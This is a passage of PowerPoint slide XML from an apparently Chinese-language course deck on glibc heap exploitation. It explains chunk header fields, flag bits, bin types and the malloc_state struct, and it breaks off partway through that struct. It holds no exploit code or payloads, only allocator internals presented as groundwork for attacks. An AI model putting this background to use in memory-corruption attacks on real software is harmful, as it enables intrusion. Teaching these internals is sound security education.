              <a:rPr lang="zh-CN" altLang="en-US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，以数组的形式存在，数组元素为相应大小的 chunk 链表的链表头，存在于 arena 的 malloc_state 中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E28EEC5-E142-441B-AB67-E3173C7F42EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870023" y="3429000"/>
            <a:ext cx="2451953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unsorted bin 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fast bins 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small bins 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large bins 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(tcache)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CA7FB3B-4034-4BD6-932B-8C209A3D4AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2217338537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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="20662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prev_size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6E5CD911-EB0F-4F15-ADE1-2945AF5018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0" y="2160000"/>
            <a:ext cx="4010025" cy="3152775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E57F36EF-3E58-4E3D-8BC9-DD96A1300718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="36677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若前一个物理相邻的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chunk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free chunk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，则表示其大小。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否则用于存储前一个</a:t>
            </a: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chunk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的数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1735503061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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="9589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size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D2C6478-A061-4798-8A65-874B9BD7B0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0" y="2160000"/>
            <a:ext cx="4010025" cy="305752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7465E100-D0E7-40A3-95CC-D79AFCF09B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="36677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占据一字长的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低</a:t>
            </a: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3bits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以后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的地址，用于表示当前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chunk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的大小（整个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chunk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的大小，包括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chunk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头）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2314737701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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="14159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 flag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BF4D882-555C-49DC-B8BC-1FEEFA07C4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0" y="2160000"/>
            <a:ext cx="3914775" cy="305752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78608A8-B7DA-4174-913A-62A24A132EE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="36677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NON_MAIN_ARENA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，记录当前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chunk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是否不属于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主线程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表示不属于，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0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表示属于。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9993883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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="15281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M flag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7F59E60-D320-49FC-A8FC-9F9AC8CAC4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0" y="2160000"/>
            <a:ext cx="3914775" cy="3057525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54128C17-D399-4CCD-AAF5-BB5A8B0E230C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667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IS_MAPPED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，记录当前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chunk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是否是由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1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mmap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分配的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4117541171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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="13758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 flag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BEB312B-8CB1-4496-8BFE-1303AFFF70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0" y="2160000"/>
            <a:ext cx="3914775" cy="305752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5984AAA0-591F-475F-A31D-2AF5B66D9614}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="2454216"/>
            <a:ext cx="366776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PREV_INUSE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，记录前一个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chunk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块是否被分配。一般来说，堆中第一个被分配的内存块的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size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字段的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P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位都会被设置为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，以便于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防止访问前面的非法内存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。当一个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chunk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size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P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位为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0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时，我们能通过 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prev_size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字段来获取上一个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chunk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的大小以及地址。这也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方便进行空闲 </a:t>
            </a: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chunk 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之间的合并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2022173828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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="22587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fd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pointer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3171F35-116A-4A27-B60B-B414BA6700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0" y="2160000"/>
            <a:ext cx="4010025" cy="305752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BE911DE9-12D4-4211-A642-E77398D7E20E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667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bin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中指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向下一个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（非物理相邻）空闲的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chunk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25530099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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="23389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bk pointer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8AF59CC-C7B3-4ACF-9399-8774E175B3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0" y="2160000"/>
            <a:ext cx="4010025" cy="305752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A0ADB66-7BC6-41BD-85A8-D195BB252BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667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bin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中指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向上一个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（非物理相邻）空闲的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chunk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51234707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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="24978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fd_nextsize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643660D-2294-4292-939E-93EA61CE20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0" y="2160000"/>
            <a:ext cx="4010025" cy="305752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C9F2BB01-EFD7-4981-92A6-E55036B43D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="36677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large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bin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中指向前一个与当前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chunk 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大小不同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的第一个空闲块，不包含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bin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的头指针</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3802601136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A98720B4-6763-4FDE-8486-84858A318A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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堆利用 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chunk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4875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="25779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bk_nextsize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5389CB7-7F5D-4268-82B5-733CE28BA5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0" y="2160000"/>
            <a:ext cx="4010025" cy="305752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7DFBCE28-02B8-43DA-8E12-13C87AA28DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="36677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large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bin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中指向后一个与当前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chunk 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大小不同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的第一个空闲块，不包含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bin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的头指针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1BD9B44-6D6C-43A6-B8EA-53A46EBC9478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589280" y="6170686"/>
            <a:ext cx="1146048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一般空闲的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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large chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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的遍历顺序中，按照由大到小的顺序排列。这样做可以避免在寻找合适 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="160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挨个遍历</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty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61839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493C0663-927A-4C0F-A8BD-51B5E9BD1F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413" y="1062257"/>
            <a:ext cx="10193173" cy="5506218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53E88B0F-B4CC-4AE2-985B-A4A5F9D4034C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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进程虚拟地址空间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5601872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B1C3A78D-0F5D-4103-9FE5-455AD0BD5122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588072" y="1202327"/>
            <a:ext cx="11015856" cy="544764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rgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Serialize access.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>libc_lock_define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Flags (formerly in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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max_fast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="12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altLang="zh-CN" sz="12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sz="12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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Fastbins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1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mfastbinptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00108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fastbinsY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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[ NFASTBINS ];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Base of the topmost chunk -- not otherwise kept in a bin */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="12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altLang="zh-CN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mchunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00108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top</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* The remainder from the most recent split of a small request */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="12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altLang="zh-CN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mchunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00108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last_remainder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Normal bins packed as described above */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1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mchunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00108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bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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[ NBINS * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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 ];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Bitmap of bins, help to speed up the process of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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determinating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> if a given bin is definitely empty.*/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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sz="12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zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>binmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ BINMAPSIZE ];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Linked list, points to the next arena */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Linked list for free arenas.  Access to this field is serialized</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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free_list_lock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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arena.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN" sz="12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altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
